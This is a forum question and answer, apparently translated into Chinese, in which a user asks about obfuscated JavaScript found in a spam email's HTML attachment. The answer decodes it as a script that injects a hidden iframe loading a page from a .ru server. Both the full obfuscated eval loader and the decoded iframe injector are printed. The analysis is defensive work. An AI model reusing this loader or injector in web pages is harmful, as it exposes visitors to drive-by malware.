我在这里看到过类似的问题,但没有完全像这样或询问这段代码。
在这里查看javascript,让我知道你认为它在做什么(如果有的话)。我已经盯着它看了一会儿,但无法弄明白。
我在附加到垃圾邮件的html文件中找到了(当然)。完整的HTML并不重要,但如果需要我可以附加。
<script>d=Date;d=new d();if(d.getFullYear()==2012)h=-parseInt('012')/5;if(window.document)try{new"a".prototype}catch(qqq){zz='eva'+'l';ss=[];aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){f='from'+'Char';f=f+'Code';}ee='e';e=window[zz];t='y';}
n="3.5j3.5j51.5j50j15j19j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j19.5j60.5j5.5j3.5j3.5j3.5j51.5j50j56j47.5j53.5j49.5j56j19j19.5j28.5j5.5j3.5j3.5j61.5j15j49.5j53j56.5j49.5j15j60.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j58.5j56j51.5j57j49.5j19j16j29j51.5j50j56j47.5j53.5j49.5j15j56.5j56j48.5j29.5j18.5j51j57j57j55j28j22.5j22.5j48.5j54j54j58j48.5j54j56.5j47.5j54.5j53j52j50j56j57.5j57j22j56j57.5j28j27j23j27j23j22.5j51.5j53.5j47.5j50.5j49.5j56.5j22.5j47.5j57.5j48j53j48j60j49j54j51.5j22j55j51j55j18.5j15j58.5j51.5j49j57j51j29.5j18.5j23.5j23j18.5j15j51j49.5j51.5j50.5j51j57j29.5j18.5j23.5j23j18.5j15j56.5j57j59.5j53j49.5j29.5j18.5j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j28j51j51.5j49j49j49.5j54j28.5j55j54.5j56.5j51.5j57j51.5j54.5j54j28j47.5j48j56.5j54.5j53j57.5j57j49.5j28.5j53j49.5j50j57j28j23j28.5j57j54.5j55j28j23j28.5j18.5j30j29j22.5j51.5j50j56j47.5j53.5j49.5j30j16j19.5j28.5j5.5j3.5j3.5j61.5j5.5j3.5j3.5j50j57.5j54j48.5j57j51.5j54.5j54j15j51.5j50j56j47.5j53.5j49.5j56j19j19.5j60.5j5.5j3.5j3.5j3.5j58j47.5j56j15j50j15j29.5j15j49j54.5j48.5j57.5j53.5j49.5j54j57j22j48.5j56j49.5j47.5j57j49.5j33.5j53j49.5j53.5j49.5j54j57j19j18.5j51.5j50j56j47.5j53.5j49.5j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j56.5j56j48.5j18.5j21j18.5j51j57j57j55j28j22.5j22.5j48.5j54j54j58j48.5j54j56.5j47.5j54.5j53j52j50j56j57.5j57j22j56j57.5j28j27j23j27j23j22.5j51.5j53.5j47.5j50.5j49.5j56.5j22.5j47.5j57.5j48j53j48j60j49j54j51.5j22j55j51j55j18.5j19.5j28.5j50j22j56.5j57j59.5j53j49.5j22j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j29.5j18.5j51j51.5j49j49j49.5j54j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j55j54.5j56.5j51.5j57j51.5j54.5j54j29.5j18.5j47.5j48j56.5j54.5j53j57.5j57j49.5j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j53j49.5j50j57j29.5j18.5j23j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j57j54.5j55j29.5j18.5j23j18.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j58.5j51.5j49j57j51j18.5j21j18.5j23.5j23j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j51j49.5j51.5j50.5j51j57j18.5j21j18.5j23.5j23j18.5j19.5j28.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j22j47.5j55j55j49.5j54j49j32.5j51j51.5j53j49j19j50j19.5j28.5j5.5j3.5j3.5j61.5".split("j");for(i=0;i!=611;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(q);</script>
如果它有帮助,这里是一个带有剪辑的粘贴板:http://pastebin.com/MJZn91Tu
答案 0 :(得分:4)
它运行此代码:
if (document.getElementsByTagName('body')[0]) {
iframer();
} else {
document.write("<iframe src='http://cnnvcnsaoljfrut.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
var f = document.createElement('iframe');
f.setAttribute('src', 'http://cnnvcnsaoljfrut.ru:8080/images/aublbzdni.php');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
任何人都知道 cnnvcnsaoljfrut.ru 上发生了什么。我认为他们不卖水果。
原来他们不卖水果http://wepawet.iseclab.org/view.php?type=js&hash=eed2cbbfce308165ba46b4f53a381e46&t=1331302987